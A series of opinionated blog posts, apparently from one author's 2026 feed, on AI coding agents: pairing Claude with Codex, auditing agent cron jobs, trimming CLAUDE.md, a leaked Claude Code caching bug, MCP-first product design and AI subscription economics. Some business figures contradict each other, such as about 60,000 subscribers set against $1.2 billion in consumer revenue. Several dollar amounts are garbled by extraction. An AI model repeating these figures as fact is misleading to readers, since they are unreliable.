2. The planner-executor split. Use Claude for the part it’s good at — exploring a messy problem space, drafting a plan, proposing a dozen angles. Then hand the plan to Codex for implementation. u/ocombe on r/ClaudeCode:“Run claude for the plan & fast work, use codex for thorough plan & code reviews.” u/mrothro’s version:“I use Claude Code for ideating and small implementation, then tell it to run Codex to do complex implementations and code reviews.”

The pattern is consistent across the threads: Claude’s strength is at the start (wide search, first drafts); Codex’s strength is at the end (narrow, verify, harden).

3. Cross-harness rule enforcement. Rules one model ignores, the other enforces. If Claude drifts on a constraint you set, Codex catches it in review. If Codex is too literal and missed an obvious improvement, Claude’s adjacent-concerns bias surfaces it. Two different failure modes cancel each other out.

4. Throughput. Both platforms throttle hard at the Max/Pro tier. When Claude hits limits on Friday morning, you switch to Codex and keep shipping. One r/ClaudeCode commenter reported pulling down from a Claude 20x plan to 5x, then adding a $100/mo Codex plan — roughly the same total cost, dramatically more runway. I’m not sure that math works for everyone, but the principle holds: one subscription is a single point of failure.

Agent-Flywheel Is the Tooling Signal

There’s a product calledagent-flywheel.com that pre-configures Claude Code, Codex CLI, and Gemini on a fresh VPS. Total damage — VPS plus both Max/Pro subs — lands between 440and440and656 a month. That’s a car payment for a car that writes your code.

What I find interesting isn’t the tool. It’s the bet underneath it: a whole product assumes real developers want all three installed by default. Six months ago that would have read as overkill. Today it reads as table stakes.

The hype cycle hasn’t caught up yet. The mainstream take is still “pick your favorite,” as though these were ice cream flavors. The people actually shipping production code with agents have quietly moved to “run both. Sometimes three. And don’t make a big deal about it.”

I’m planning to deploy it — not on a greenfield project (everybody has a greenfield story), but on an existing one already shipping to real users. The interesting question isn’t whether a three-agent stack works on a clean slate. It’s what breaks when you wire it into a codebase with real uptime constraints, customers, and six months of decisions the tooling didn’t witness. Real-world battle stories from agent-flywheel setups are scarce. I want to write one.

The Honest Part: I Don’t Have the Workflow Figured Out Yet

Everything above reads like I’ve got this nailed. I don’t. Here’s the list of things I still don’t know, offered in the spirit of not pretending:

When exactly to hand off. I know Claude should plan and Codex should review. I don’t have a clean trigger. Sometimes I bounce mid-implementation because Claude is about to go off the rails. Sometimes I trust Claude to finish and Codex only sees the final diff. The “right” cadence isn’t obvious.

How much context to share. Each agent wants the fullCLAUDE.md /AGENTS.md treatment. Writing both, keeping them in sync, and remembering which one has which convention is its own small job. I haven’t found a clean answer.

Whether the adversarial review actually catches bugs. It sounds great in theory. In practice, most of the time both agents agree the work is done, and the bugs I catch in review are ones I would have caught with one agent too. The hallucination-diversity argument may be overstated at the tasks most of us are actually doing.

Whether the cost is worth it at my usage. I’m not running agents 40 hours a week. At $400+/month for the dual sub, I’m probably over-subscribed for my actual throughput. The math gets better if you’re coding all day. I’m not.

Who Should Dual-Sub, Who Shouldn’t

Do it if you’re a solo dev shipping production code daily. You’ll hit Friday-morning limits on one platform whether you budget for it or not, and the adversarial review actually catches things. The cost is real. The throughput gain is bigger. Do the math; it pencils.

Don’t bother if you code a few hours a week. The switching tax and the subscription burn aren’t worth it at low volume. Pick one and move on. Claude if you want initiative. Codex if you want restraint. Nobody is grading you on this.

It’s complicated if you’re at a day job where the company pays for one and you’ve got a side project. Use the company sub for the day job. Don’t stack a second personal sub unless the side project is actually shipping — not “actually going to ship next month,”actually shipping, this week, to real users. The number of people running dual subs to ship nothing is, I suspect, not small.

What This Is Really About

The “ditch ChatGPT for Claude” narrative was a 2025 story. It was right for its moment. But the 2026 version of that story isn’t “ditch Claude for Codex.” It’s “stop treating this as a winner-take-all market.”

Different models have different biases baked into their harnesses. Claude overreaches. Codex underreaches. Gemini is still figuring out its personality. The right move isn’t to pick the bias you like. It’s to stack biases against each other so their failure modes cancel out.

I don’t have this workflow figured out. Neither does anyone else I’ve read on Reddit, honestly — the high-upvote posts are mostly single-tool takes, and the real insight is buried in the comments of threads with a few hundred upvotes.

But “only use one” is already wrong. That much is clear.

]]>

My Agent Runs 10 Cron Jobs. Three of Them Are Worth the Electricity.

Lakshmi Narasimhan — Mon, 20 Apr 2026 00:00:00 +0000

I have a daemon that runs on a server. It’s been up for seven weeks. It has ten scheduled jobs — some hourly, some daily, some weekly. Or at least, that’s what’s on paper.

This is what people are calling “the future of work.”

I’m not sure it is. I’m sure it’s what sells on Twitter.

The demo economy

Always-on agents photograph well. That’s most of what’s going on.

“My agent posted while I slept” is tweetable in a way that “I wrote a cron job” isn’t, even when the outputs are identical. The demo-industrial complex has figured this out. YouTubers build daemons. Framework authors build daemons. There are now three different subreddits comparing daemons. The flywheel is real, the content is prolific, and very little of it is honest about what the daemon is actually producing.

The hype bundles together several different things that deserve to be separated:

Agents thatrun work while you’re asleep (useful, conditionally)
Agents thatreact to things happening in the world (useful, conditionally)
Agents thatcapture things as they happen on your phone (useful, conditionally)
Agents thatrun heartbeats and ask themselves what to do (pure performance art)
Agents thatself-evolve in a loop in the background (fun demos, almost no output)
Agents thatspawn a hundred parallel subagents to research a topic (almost always worse than one good search)

The hype treats all six as the same thing. They aren’t.

The 20% that actually earns its keep

Honest list of when a background daemon does something a CLI or a 10-line bash cron can’t:

Scheduled work that has to happen when you’re not there. Crawl competitor sites at 3am. Pull last night’s Sentry errors. Summarize overnight industry chatter into a 7am brief. Your laptop is off, something has to be running somewhere. Legitimate.

Reactive triggers on external events.

Email arrives -> triage.

Substack comment -> draft reply.

Sentry alert -> diagnose + suggest fix.

The trigger comes from outside; compute has to meet it. Legitimate if the volume actually warrants automation (if you get three emails a day, triage is a solved problem — your inbox).

On-the-move capture.

Voice memo from your phone -> transcribed -> landed in memory.

Forwarding a link from your phone to your agent. The value is that capture happens when inspired, not when at desk. Real lift for content creators who have thoughts in elevators.

Judgment-laden monitoring.

Not “disk at 80%” — any shell script can do that.“Disk at 80% AND growing 2% per hour AND that’s unusual for this host.”

Requires context; needs to know what normal looks like. This is where LLMs in a daemon genuinely beat a threshold-based alerting stack.

That’s it. Four categories. Anything else is mostly burning tokens.

The 80% that’s noise

Heartbeats that ask the agent “anything to do?”

The agent wakes up, loads context, decides there isn’t anything to do, goes back to sleep. You pay for the loaded context every time. Over a day this adds up to real money for the privilege of watching an agent shrug.

Self-evolution loops.

“The agent improves itself while you sleep.” What it’s usually doing is refactoring its own prompts in circles. Cool demo on YouTube. Zero measurable outcome delta after a month of running.

Parallel subagent fan-out for research.

Ten agents search the web about the same question and return ten lightly-paraphrased versions of the same top three results. One focused 10-minute session beats this, almost always.

“Long-running overnight research tasks.”

When the output lands in your morning inbox, is it better than what 30 focused minutes at your desk would produce? Honestly check. Usually no.

Replacing things you could cron in 10 lines of bash.

The test: could a $5 VPS with a shell script + cron +jq do this? If yes, you’re not using AI for the part that needs AI. You’re using it because daemons are cool.

Receipts: what’s actually on my VM

I pulled the daemon’s state file and the log directory while writing this. Fifty-four days of uptime. Ten jobs on paper. The picture is worse than I thought.

Three are running reliably.

sentry-monitor has fired 191 times since early March. Latest run: this morning. When the night throws errors it reads them, groups them, and suggests a fix — not a link to the stack trace, an actual “here’s what’s probably wrong and here’s the one-line change.” Category 2 plus category 4. Keep.

infra-health has fired 190 times on basically the same cadence. Knows what normal looks like per host. Stays quiet when a disk spike is a scheduled backup and shouts when it isn’t. Category 4. The whole reason an LLM beats a thresholds-and-Prometheus stack here, and no, you cannot Grafana your way to this in under six months of tuning. Keep.

scout has fired 71 times across seven weeks. Daily-ish. Scans Reddit, HN, and Substack for signal that feeds this blog’s content calendar. Ido use the output. Category 2 if I’m generous. Keep — but it absorbs the next two jobs on the list below.

Now the uncomfortable part.

Three of the ten have straight-up stopped running and I didn’t notice.

morning-brief was scheduled daily at 6am. It last fired on March 18. A full month of no overnight brief. I did not miss it. I did not investigate. I did not know.

seo-audit was weekly. It has run exactly once in the daemon’s entire fifty-four-day lifetime, on March 1. Seven missed weeks. Nobody wrote a bug report to themselves. Nobody opened a file that wasn’t there.

auto-draft was supposed to produce a draft post every day. It has run exactly once, on April 11. Eight days of silence. Also unnoticed.

If a job stopped running a month ago and you didn’t miss it, the job was never producing anything that mattered. That’s not my heuristic. That’s the audit, evaluating itself while I was busy talking about audits on Twitter.

Four more are in some stage of limping.

reddit-scan — 27 runs over 45 days, last one April 10. Running, sort of, when the mood takes it. Nine days of silence so far on that one.

x-scan — identical pattern to reddit-scan. Same overlap. Same drift. Same silence since April 10. These two were supposed to be complementary; they’ve turned out to be redundantand unreliable, which is a rare trick.

engagement-brief — four runs, total, in the job’s entire lifetime. Not daily. Not weekly. More like “occasionally, if the stars align.”

x-analytics — three runs, last one March 16. Effectively dead, which is fine, because I check my X numbers roughly once a month anyway.

Final tally, the honest one.

Three jobs firing on schedule, producing output I use. Three jobs that silently stopped weeks ago and nobody in this house noticed, including me. Four jobs wandering between “running” and “not really” with no clear reason why.

Three-of-ten is the optimistic read. The pessimistic read is that six of the ten audited themselves — they cut themselves by going quiet, and I hadn’t even done them the courtesy of looking.

This is from someone who builds daemons for a living and writes about them for a job. What do you think yours looks like under the hood?

The five-question self-test

Before you keep any always-on agent job, make it answer these:

Would I actually miss this if it stopped? If you turned it off for two weeks and no one noticed, it’s not producing value. It’s producing comfort.
Does the cadence match downstream consumption? A job that fires 4x/day for output you read weekly is 27 extra runs a week of pure overhead.
Is the trigger genuinely external? (Scheduled time, incoming event, captured input.) If the agent is just checking on itself, you’ve built a Roomba that vacuums an empty room.
Could a shell script + cron +jqdo this? If yes, you’re not using AI for the part that needs AI.
Does the output change my behaviour? If yesterday’s run and last Thursday’s run would have produced the same action from me (or none), one of them was wasted.

Honest answers will cull your cron list by half. Mine certainly did, once I stopped writing this post and actually did the audit.

What this isn’t saying

I’m not arguing against always-on agents. I’m arguing against always-on agents thataren’t doing anything.

There’s real value when the conditions line up — work-while-you-sleep, external-trigger-response, on-the-move-capture, judgment-laden-monitoring. The reason I keep the daemon running (even after cutting half its jobs) is those four categories genuinely earn the monthly subscription. The reason I’m writing this is that the other six patterns — the ones that photograph well — are funding a lot of framework development and not much measurable outcome.

If your agent is doing category 1-4 work, the hype is warranted. If it’s doing category 5-6 work, you’re paying a subscription to a demo.

The uncomfortable question for most of the agent-community content right now iswhich category is the thing being demoed, really? And whether the person demoing it has done the five-question audit on their own cron list.

My guess: very few have. The demo economy doesn’t reward the audit. It rewards the screenshot of the agent waking up at 3am and pretending to be useful.

]]>

Your CLAUDE.md Is Making Claude Dumber

Lakshmi Narasimhan — Mon, 06 Apr 2026 00:00:00 +0000

Your CLAUDE.md is 800 lines long. You spent a weekend organizing it into 27 modular files with a routing system. You wrote a blog post about it. You got upvotes.

Claude is ignoring most of it.

There’s an arms race happening in the Claude Code community right now. Every week, someone posts their increasingly elaborate CLAUDE.md setup. 27-file architectures. Tiered loading systems. Router patterns with conditional context injection.

One developersplit their CLAUDE.md into 27 files with a three-tier routing system. 360 upvotes. The post opens with: “My CLAUDE.md was ~800 lines. It worked until it didn’t. Rules for one context bled into another, edits had unpredictable side effects, and the model quietly ignored constraints buried 600 lines deep.”

The top comment, with 81 upvotes? “So not sure if you realised you can have descendant CLAUDE.md so you don’t even need to do this.”

Meanwhile, a developer in the same thread: “I don’t even use claude.md. Y’all are roleplaying being productive. Just work with it 1:1.”

One group is optimizing. The other is actually working.

The Research Says You’re Doing It Wrong

ETH Zurich researcherspublished a paper that should have made every CLAUDE.md maximalist uncomfortable. Their finding: context files — the .md files we all obsess over — tend toreduce task success rates compared to providing no repository context at all. And they increase inference cost by over 20%.

Read that again. No CLAUDE.md outperformed having one. On average.

When this paper hit Reddit, the poster titled it “No CLAUDE.md → baseline. Bad CLAUDE.md → worse. Good CLAUDE.md → better.” — an optimistic spin suggesting the file isn’t the problem, your writing is. The post got 209 upvotes. But the top comments immediately called it out: OP had misread the data. The actual finding was that havingany .md file — human or LLM-written — led to worse performance than having none. The auto-generated thread summary confirmed it: “The consensus in this thread is that you’ve completely misread the paper.”

It gets worse. LLM-generated .md files hurt the most, because they just parrot back what’s already in the code. Human-written files showed a slight positive impact — but only when kept to an absolute minimum, and only for smaller models.

A separate benchmark of 1,188 runs across Haiku, Sonnet, and Opus confirmed this. Twelve coding tasks. Ten instruction profiles. The result: an empty CLAUDE.md scored best overall.

The researcher’s own correction was admirably blunt: “I was wrong about CLAUDE.md compression. Here’s what the data actually showed.”

You Have an Instruction Budget. You’re Blowing It.

Here’s the mechanism nobody talks about.

Frontier models reliably follow about 150 to 200 instructions before performance starts decaying. Not crashing — decaying. Every additional instruction slightly degrades compliance with every other instruction. The degradation is uniform. Your critical “NEVER delete the production database” rule gets weaker every time you add “prefer camelCase for variable names.”

Claude Code’s own system prompt already burns about 50 of those instruction slots. That’s before your CLAUDE.md even loads.

So you have roughly 100-150 instruction slots left. Your 800-line CLAUDE.md with coding conventions, style guides, architecture decisions, tool preferences, workflow rules, and team norms is trying to cram 400 instructions into 150 slots.

The model doesn’t crash. It just quietly starts ignoring things. Specifically, the things buried deepest in the file. Your most important rules — the ones you added after painful debugging sessions — are probably at the bottom. Which means they’re the first to get deprioritized.

Claude Is Designed to Ignore You

This is the part that should make you pause.

Claude Code’s system prompt includes this line about CLAUDE.md content:

“This context may or may not be relevant to your tasks. You should not respond to this context unless it is highly relevant.”

Claude is literally instructed to deprioritize your instructions if they don’t seem relevant to the current task. The more task-specific content you stuff into CLAUDE.md, the more likely Claude treats the entire file as noise.

That database schema guidance? Irrelevant when Claude is working on frontend CSS. Those API naming conventions? Noise when it’s writing tests. Your elaborate deployment workflow? Invisible during a refactoring session.

Every irrelevant instruction trains Claude to ignore the relevant ones too.

The Context Window Tax

Here’s the math nobody does. Claude Code’s system prompt alone consumes roughly 23,000 tokens — about 11% of the 200K context window, gone before you type a word. Add your CLAUDE.md, your MCP tool schemas, skill descriptions, memory files, and rules. One developermeasured 69,200 tokens of overhead — 35% of the context window consumed before a single user message. Others in the thread pushed back on that specific number, but the principle stands: every always-loaded instruction competes with working memory.

And it’s not just a cost problem. It’s an accuracy problem. The fuller the context window gets, the worse Claude performs — what Anthropic calls context rot. Your elaborate CLAUDE.md isn’t just burning tokens. It’s actively degrading the quality of every response.

The Leverage Problem

Here’s why this matters more than you think.

Bad code is localized. You write a buggy function, it breaks one feature. You fix it, you move on.

Bad CLAUDE.md instructions compound. A single misguided rule in your CLAUDE.md affects every research phase, every plan, every implementation, every session. One line that says “always use verbose error messages with full stack traces” produces thousands of lines of noisy code across your entire codebase, across every agent, across every session.

Your CLAUDE.md is the highest-leverage file in your repo. Most people treat it like a junk drawer.

What the Minimalists Actually Do

I went looking for people who run Claude Code with minimal or no CLAUDE.md. They’re out there. They’re quiet about it because “I don’t use CLAUDE.md” doesn’t get upvotes.

One developer on Reddit: “I use Claude Code bare bones professionally. It all sounds like bloat not giving real value.” Another: “I load no skills, no agents, no MCP Servers and rock it all day every day, 12 hours a day. Life is good.”

A developerwho built a 13-agent orchestration system with 8,157 lines of markdown deleted 93% of it. His conclusion: “My enhancement layer was making Claude dumber by filling its brain with instructions about how to think, leaving less room for actual thinking.” After the deletion, Claude performedbetter on the same tasks.

Another developer witha 350-line CLAUDE.md and 20+ custom MCP tools put it simply: “It feels like the more context I add the more it struggles to get the job done. It seems to get ‘dumber’.”

And when someoneasked the community to break down the meta on all the conflicting CLAUDE.md advice, the most honest reply got it right: “If ‘best practices’ are conflicting, it’s probably a sign of them mostly being a type of placebo on the part of the folks posting them. The human mind has a weird need to be the special one who cracked the code.”

The pattern is consistent: people who remove instructions report better results than people who add them.

Instructions Raise the Floor, Not the Ceiling

The benchmark data revealed something nuanced. Instructions don’t make Claude better on average. They make it more consistent.

On tasks where Claude already performs well, instructions add nothing. On tasks where Claude struggles, a focused workflow checklist gave Opus a +5.8 point lift and raised its worst-case score by 20+ points.

A2,455-evaluation benchmark across Sonnet and Opus confirmed a related finding: the best-performing configuration was a short CLAUDE.md with pointers to skills that load on demand — not a massive monolith, not 27 modular files, but a minimal routing layer that tells Claude where to find context when it’s actually needed.

This changes everything about how you should think about CLAUDE.md.

Don’t use it to make Claude smarter. Use it to prevent Claude from being stupid in specific, known ways. The difference between those two goals is the difference between a 60-line file and an 800-line file.

What Actually Belongs in CLAUDE.md

After digging through research, benchmarks, and hundreds of Reddit threads, here’s what survives the cut:

The What-Why-How skeleton (under 60 lines):

WHAT: Your stack, project structure, key directories
WHY: What this project does and for whom
HOW: Build commands, test commands, deploy commands

Negatives over positives:
“NEVER use X” sticks. “Always prefer Y” fades. If you can phrase it as a prohibition, it enforces better. “DO NOT modify the database schema without migration files” beats “Always create migrations when changing the schema.”

Trigger-action format:
“WHEN CI fails, DO NOT push until fixed” enforces consistently. “Always test before pushing” doesn’t. Specificity matters.

Pointers, not content:
Reference external docs instead of embedding them. “See agent_docs/database.md for schema guidance” loads on demand. Pasting the full schema into CLAUDE.md loads every single session, whether Claude needs it or not.

Subdirectory CLAUDE.md files:
Claude auto-loads CLAUDE.md from whatever directory it’s reading files in. Put backend rules in backend/CLAUDE.md. Put frontend rules in frontend/CLAUDE.md. Context-specific rules load only when contextually relevant.

What Doesn’t Belong

Style guides. Claude is an in-context learner. If your code follows consistent patterns, Claude will match them without being told. Use linters and formatters — they’re deterministic, fast, and don’t eat instruction budget.

LLM-generated instructions. The research is clear: auto-generated .md files hurt performance. Don’t use /init. Don’t ask Claude to write its own CLAUDE.md. The model just repeats what’s already in the code, wasting tokens to tell itself what it already knows.

Lessons learned logs. Once the lesson is codified in the codebase itself — as a test, a lint rule, a hook — the .md entry is redundant. Delete it.

Persona assignments. “You are a meticulous senior engineer who always…” is a costume, not a capability. As one developerrunning overnight cron agents put it: “A syntax check that returns exit code 1 on failure > 2,000 words of ‘you are a meticulous senior engineer who always…’” The agents with minimal instructions consistently outperformed the ones with elaborate persona prompts.

The Real Best Practice

Keep your CLAUDE.md under 100 lines. Ideally under 60. Put the most important rules at the top. Phrase them as negatives. Use trigger-action format. Point to external docs instead of embedding content.

Then stop optimizing and go build something.

The developers shipping the most code aren’t the ones with the fanciest CLAUDE.md architectures. They’re the ones who figured out the minimum viable instructions and moved on to the actual work.

Your CLAUDE.md is not your product. Stop treating it like one.

]]>

The Claude Code Leak Revealed a Token Drain Bug. The Real Problem Is Bigger.

Lakshmi Narasimhan — Thu, 02 Apr 2026 00:00:00 +0000

Follow-up to:Anthropic Is Losing Money on You Every Month. What Are You Shipping?

Three weeks ago, I wrote that Anthropic is losing money on every subscriber and that smart developers should ship like crazy before the economics normalize.

I was right about the thesis. I was wrong about the timeline.

The window isn’t closing in 18-24 months. It’s closing now.

What Changed in Three Weeks

Three things happened in rapid succession that accelerated the timeline:

1. Claude subscriptions doubled. Anthropic’s paid user base went from ~30k to ~60k subscribers between January and March 2026. Record growth. The Claude Code launch, Super Bowl buzz, and Cowork tools drove a wave of new signups.

2. Rate limits got brutal. Users on r/ClaudeAI went from “this is amazing” to “I can’t work” practically overnight. Pro users ($20/month) report hitting 10% of their daily quota from a single prompt. Max users ($100-200/month) report the same degradation. One Max 20x subscriber — paying $200/month — couldn’t work for nine consecutive days.

3. The source code leaked. On March 31, 2026, a 59.8 MB source map file was accidentally shipped in the Claude Code npm package. 512,000 lines of TypeScript, mirrored across GitHub within hours. And buried in that code was proof of something users had been complaining about for weeks.

The Token Drain Bug

Here’s what the leak revealed.

Claude Code has a function calleddb8 that filters what gets saved to session files. For non-Anthropic users, it strips out all attachment-type messages — includingdeferred_tools_delta records that track which tools the model already knows about.

When you resume a session, Claude Code scans your history to figure out what tools it already announced. But becausedb8 nuked those records, it finds nothing. So it re-announces every deferred tool from scratch. Every. Single. Resume.

This breaks prompt caching in three ways:

System reminders shift positions in the message array
The billing hash changes because the first message content differs
The cache breakpoint moves because the array length is different

Result: your entire conversation rebuilds ascache_creation tokens instead of hittingcache_read. The longer the conversation, the worse the drain.

One user patched the two-line fix and posted it. His 5-hour usage dropped from spiralling out of control to 6% — normal levels. The post got 367 upvotes. A sharp commenter noted the patch also bypasses billing controls on cache TTL, which makes it not just a bug fix, but let’s set that aside.

Here’s the uncomfortable part: this bug was burning tokens silently for weeks. Users were complaining about rate limits. Anthropic’s status page showed “no incidents.” And the actual cause was a caching bug in their own client code.

The Math Doesn’t Work

Let’s do the numbers.

Anthropic’s annualized revenue is roughly $14 billion. Claude Code alone accounts for $2.5 billion of that run rate — up from $500 million just three months earlier. Consumer subscriptions generated about $1.2 billion in 2025, with 1,000%+ year-over-year growth.

Sounds great, right? Until you look at the other side of the ledger.

Anthropic burned approximately $5.2 billion in 2025. They’ve committed over $80 billion in cloud infrastructure costs through 2029. They just raised $30 billion in a Series G at a $380 billion valuation — the second-largest private tech financing ever, behind only OpenAI.

They’re buying compute at a staggering scale: 1 million Google TPUv7 chips (~$52 billion deal), a dedicated 1,200-acre AWS data center campus in Indiana ($11 billion), and a $50 billion deal with Fluidstack for facilities in Texas and New York. Total committed compute: over 2 gigawatts.

All of this is funded by venture capital and strategic investors (Amazon’s $8B+, Google’s $3B+). Not by your $20/month Pro subscription.

Anthropic projects positive free cash flow by 2027-2028. That’s the plan. But plans require the revenue to actually materialize, the compute to come online in time, and the unit economics to hold as usage scales.

Right now, 60,000 subscribers are overwhelming the existing infrastructure so badly that paying customers can’t work.

The Subsidy Is Collapsing Under Its Own Success

Here’s the dynamic I didn’t fully appreciate three weeks ago.

The subsidy doesn’t end with a price increase. It ends with degradation.

Anthropic can’t raise prices on Pro from 20to20to50 tomorrow — that would cause a revolt and hand users to OpenAI and Google. But they can let the service get worse at the current price. Tighter rate limits. More frequent throttling. Peak-hour queuing. Features that work “sometimes.”

This is exactly what’s happening.

The math is simple. Double the subscribers on the same compute = everyone gets half the capacity. As one Reddit user put it: “selling more seats on the same plane and wondering why legroom is shrinking.”

And Anthropic isn’t alone. Google slashed Gemini API free tier quotas by 50-92% overnight in December 2025. One developer went from 300M+ input tokens per week to hitting limits at less than 9M. OpenAI’s ChatGPT Pro at $200/month is the only major offering that effectively removes caps — but at ten times the price of a Pro subscription.

The pattern across the industry: subsidized tiers are getting squeezed. The compute costs are real. And the bill always comes due.

Why I’m Not Hitting Limits (And You Might Not Be Either)

Here’s a mystery. Despite all this chaos, I’ve barely noticed the rate limits. After reading the threads and the leaked source code, I think I know why.

I almost never resume sessions. The biggest token drain fires on session resume. My workflow — fresh sessions, agent registration per session, structuredCLAUDE.md — accidentally dodges this bug entirely.

Surgical prompts. I don’t say “explore my codebase.” I say “read this file and fix this function.” My beads-based task tracking means every session has a specific objective. No wandering. No 94k-token “Explore” runs.

Time zone arbitrage. IST puts my working hours outside US peak times. When r/ClaudeAI is screaming about rate limits at 2 PM Eastern, it’s midnight for me. I’m coding at 6 AM IST when San Francisco is asleep.

Structured context. BetweenCLAUDE.md,ARCHITECTURE.md, and explicit file paths, Claude doesn’t need to discover my codebase. It already knows the layout. That’s 90% less indexing work.

This isn’t luck. It’s workflow design. But it reinforces the point from my original post: the subsidy rewards those who use it efficiently. Wasteful usage — open-ended exploration, resumed conversations, vague prompts — burns tokens at 10-50x the rate of focused work.

What This Means For You

If you read my original post and thought you had 18-24 months — you might, on paper. Anthropic has the cash. They have the compute commitments. They project 70billioninrevenueby2028and70billioninrevenueby2028and17 billion in free cash flow.

But the experience of using the product is degrading right now. Not in 18 months. Now.

Here’s what actually matters:

1. Ship before the experience degrades further. The window isn’t about pricing — it’s about capability per dollar. Today, $20/month gets you frontier model access that would have cost $500/month in API calls two years ago. That ratio is moving in the wrong direction as more users pile in.

2. Optimize your workflow. Start fresh sessions. UseCLAUDE.md andARCHITECTURE.md. Be specific in your prompts. Avoid “Explore” and open-ended commands. These aren’t just productivity tips — they’re rate limit survival strategies.

3. Don’t build on the assumption of unlimited AI access. If your product or workflow requires constant frontier model access at current prices, you’re building on borrowed time. Build systems that workwith AI but can degrade gracefully. Ship products that generate revenue independent of your development tools.

4. The enterprise pivot is coming. Anthropic’s enterprise revenue is already 80% of total. They have 300,000+ business customers, with large accounts (>$100K ARR) growing 7x year-over-year. Follow the money: consumer subscriptions are the loss leader. Enterprise is the business. When push comes to shove, enterprise gets the compute.

The Real Lesson

The leaked source code is a metaphor for the entire AI subsidy era.

For weeks, users were burning through rate limits at impossible speeds. They blamed themselves (”skill issue”), they blamed Anthropic (”fix your limits”), they blamed the model (”Claude got dumber”). The actual cause was a two-line bug in a caching function that nobody could see because the code was proprietary.

That’s the subsidy in miniature. You’re using a product where you can’t see the internals, can’t predict the costs, and can’t control when the rules change. The value is extraordinary — right now. But you’re a guest in someone else’s infrastructure, running on someone else’s VC money, subject to someone else’s capacity planning.

The smartest move hasn’t changed since three weeks ago. Ship. Build durable assets — products, content, audiences, skills — while the arbitrage is still available.

But do it faster than you planned. The window isn’t closing in 18 months.

The glass is already cracking.

]]>

Your SaaS Audience Doubled. Half of Them Are AI Agents.

Lakshmi Narasimhan — Mon, 16 Mar 2026 00:00:00 +0000

I was building the wrong product for about three weeks before I noticed.

I’d started x-intel as a SuperX clone — essentially a better analytics dashboard for X. Charts, follower graphs, engagement breakdowns, competitor tracking. The kind of thing where you look at a number, decide you feel bad about it, and close the tab.

And then I was chatting with Claude about the onboarding flow, and I said something like: “when I say onboarding, I mean the app gets my context and goals, then charts a strategy, periodically reviews it, and course corrects.”

Claude’s response stopped me:“That’s a fundamentally different product. Less ‘setup wizard’, more ‘AI strategist that lives in your X account.’“

I stared at that for a while. Then I realized I’d been building the audit view and calling it the product.

The dashboard isn’t the product. The dashboard is what humans look at after the AI already figured out what’s happening.

Build the MCP server first. The dashboard ships itself.

The problem is everyone’s still building it the other way.

What Everyone Is Still Building

Claude Code exists. The MCP protocol exists. Power users are already interacting with SaaS products through AI agents — not because you built that integration, but becausethey built it themselves using whatever API you exposed. They’re writingCLAUDE.md files that say “use theStacksweller API to schedule posts” and just… doing it.

This is happening whether you designed for it or not.

The default SaaS in 2026 still ships dashboard-first: database → API → React. Users log in, stare at charts, try to draw conclusions. That model made sense when the only consumer of your product was a human looking at a screen.

That is no longer the only consumer of your product.

You can either build for this intentionally, or have it happen to you messily and then spend six months retrofitting.

The Reframe

Here’s what x-intel actually looks like when you build it right:

Intake — Claude asks who you are, what your niche is, what your X goals are, who your competitors are. You answer in plain English. Claude turns that into a structured profile using theset_profile tool.

Baseline — Claude pulls your current stats, analyzes your last 90 tweets, benchmarks against competitors. All MCP tools calling your data layer. No UI step required.

Strategy — Claude generates a content and growth plan: post frequency, best times, content formats, topics to lean into. Stored back in your database via MCP. The strategy exists before you’ve opened a browser.

Periodic review — A cron job runs weekly analysis, compares performance against the strategy, surfaces what’s working and what isn’t. Claude writes a summary. The dashboard shows that summary.

Course correction — Strategy updates based on data. Again, through tools. Again, before a human looks at anything.

The dashboard in this architecture isn’t the product. It’s an audit log. It shows you what Claude already figured out. Charts are passive — you still have to decide what to do. This tells you what to do, and then does it.

That’s a completely different product. “X-intel is your AI X strategist. Tell it your goals once. It watches your account, tracks competitors, and tells you exactly what to do next.”

That pitch destroys “SuperX but self-hosted.”

How to Actually Build MCP-First

The mechanics are simpler than they sound. Embarrassingly so.

Start bydesigning your tools for Claude, not for humans. Think about what Claude needs to do the job — not what a human wants to click on. Tool names, parameter shapes, return values should make sense to a language model.get_competitor_engagement_trend(handle, days=30) is better thangetChartData(config). One of these tells Claude what it’s getting. The other makes Claude guess.

Here’s the part nobody mentions: if you have a data layer, you have an MCP server 70% built already. Wrap your existing queries as tools. The MCP protocol is just a contract — your database doesn’t move.

You don’t need to build an “AI feature.” You need asystem prompt that gives Claude the right context, and tools that give it the right data. Claude is the strategist. Your MCP server is the strategist’s interface to your product. The actual work is thinking clearly about what Claude needs to know — not engineering.

Build the dashboard last, or thin. It’s a view layer. It shows stored strategies, weekly reviews, flagged anomalies. A log of decisions that were already made. Not a decision-support tool.

One Build, Two Audiences

Here’s the payoff that makes this worth doing even if you don’t care about being “AI-native.”

A well-designed MCP server makes your product useful to two completely different types of users with almost no additional work.

The first type opens the dashboard, reads the weekly strategy review, clicks to approve the suggested changes, and closes the tab. Normal SaaS behavior. They don’t know or care that Claude is behind it. They just want outcomes.

The second type connects your MCP server to their own Claude Code setup, writes aCLAUDE.md that describes how they want to use your product, and runs it themselves. These are your power users. They’ll do things with your product you never imagined, and they’ll tell everyone.

You still need the dashboard. Trials convert better with a UI. Not arguing otherwise. But the order matters: MCP layer first, dashboard second. The dashboard snaps on top in a weekend once the tools are solid. The reverse — retrofitting agent-friendly APIs onto a human-optimized interface — takes six months and still feels wrong.

Both audiences are real. Both are valuable. You get both by building the MCP layer correctly from the start, instead of bolting on an “AI integration” later when it’s expensive and awkward.

The dashboard-first founders will get there eventually. They’ll build the dashboard, grow slowly, and then spend six months retrofitting an API that was designed for human consumption into something an agent can actually use.

Or you build the MCP server first, ship a thin dashboard on top, and have both audiences from day one.

The dashboard ships itself. The strategist is Claude. The product is the tools you give it.

Stop building audit logs and calling them products.

]]>

Anthropic Is Losing Money on You Every Month. What Are You Shipping?

Lakshmi Narasimhan — Tue, 10 Mar 2026 00:00:00 +0000

I do this thing at the end of every month where I look at my Claude usage stats and feel mildly guilty.

Not guilty enough to stop, obviously. But guilty in the way you feel when you’ve been eating at a nice restaurant and you suddenly realize your friend with the expense account has been covering all of it. You’d have ordered differently if you knew that at the start.

Here’s what I know: I pay $200/month for Claude Max. Based on what I actually do with it — multi-hour Claude Code sessions, agents running in parallel, research deep-dives, content pipelines chewing through tokens like a hungry golden retriever — the API-rate equivalent of my usage is somewhere between $600 and $900. Every month.

Anthropic is losing money on me. On you. On every developer who’s turned this into a real part of how they build.

This isn’t an accident. This is the plan. And it has an expiration date.

The Hemorrhage Is Real

I was reading Sebastian Raschka’sBuild a Large Language Model from Scratch last week and stumbled into a footnote that sent me down a rabbit hole. He cites Lambda Labs: it would take 355 years to train GPT-3 on a single V100 datacenter GPU. On a consumer RTX 8000: 665 years.

